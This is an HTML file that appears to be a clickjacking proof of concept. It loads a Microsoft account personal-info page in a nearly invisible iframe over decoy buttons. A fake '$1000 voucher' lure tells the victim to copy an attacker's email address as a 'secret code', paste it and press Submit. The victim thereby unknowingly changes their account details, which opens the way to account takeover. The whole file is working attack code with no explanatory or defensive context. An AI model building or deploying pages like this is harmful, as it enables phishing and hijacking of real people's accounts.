<!DOCTYPE html>
<html>
<head>
	<title>Copy Voucher Code to Clipboard</title>
	<style>
		iframe {
			position:relative;
			width: 100%;
			height: 650px;
			opacity: 0.01;
			z-index: 2;
		}
		.firstClick, .secondClick, .thirdClick, .fourthClick, .fifthClick, .sixthClick, h1 {
			position:absolute;
			top:330px;
			z-index: 1;
		}
		.firstClick {
			left: 560px;
			top: 264px;
		}
		.secondClick {
			left: 561px;
			top: 328px;
		}
		.thirdClick {
			left: 559px;
			top: 385px;
		}
		.fourthClick {
			left: 1037px;
			top: 185px;
		}
		.fifthClick {
			left: 741px;
			top: 524px;
                }
		.sixthClick {
			left: 743px;
			top: 615px;
		}
		h1 {
			left: 137px;
			top: 98px;
		}
	</style>
</head>
<body>
	<h1>Congrats You Won $1000 Voucher Follow the step copy paste Secret code & claim voucher</h1>
	<button class="fourthClick">Click Here</button>
	<button class="fifthClick">Click & Paste Secret code ( Press ctrl + V)</button>
        <button class="sixthClick">Submit</button>
	<iframe src="https://portal.microsoftonline.com/account#personalinfo"></iframe>

	<script>
		var voucherDiv = document.createElement("div");
		voucherDiv.id = "voucher";
		voucherDiv.style.display = "none";
		voucherDiv.innerHTML = "<p>Here is your Secret code:</p><p></p><button id='copyVoucher'>Copy Secret Code</button>";
		document.body.appendChild(voucherDiv);

		var copyVoucherBtn = document.getElementById("copyVoucher");
		copyVoucherBtn.addEventListener("click", function(){
			var voucherCode = "whitehackzzz@gmail.com"; // replace with your actual voucher code
			copyTextToClipboard(voucherCode);
			alert("Secret code copied to clipboard!");
		});

		setTimeout(function() {
			voucherDiv.style.display = "block";
		}, 5000);

		function copyTextToClipboard(text) {
			var textArea = document.createElement("textarea");
			textArea.value = text;
			document.body.appendChild(textArea);
			textArea.select();

			try {
				document.execCommand("copy");
			} catch (err) {
				console.log("Oops, unable to copy");
			}

			document.body.removeChild(textArea);
		}
	</script>
</body>
</html>
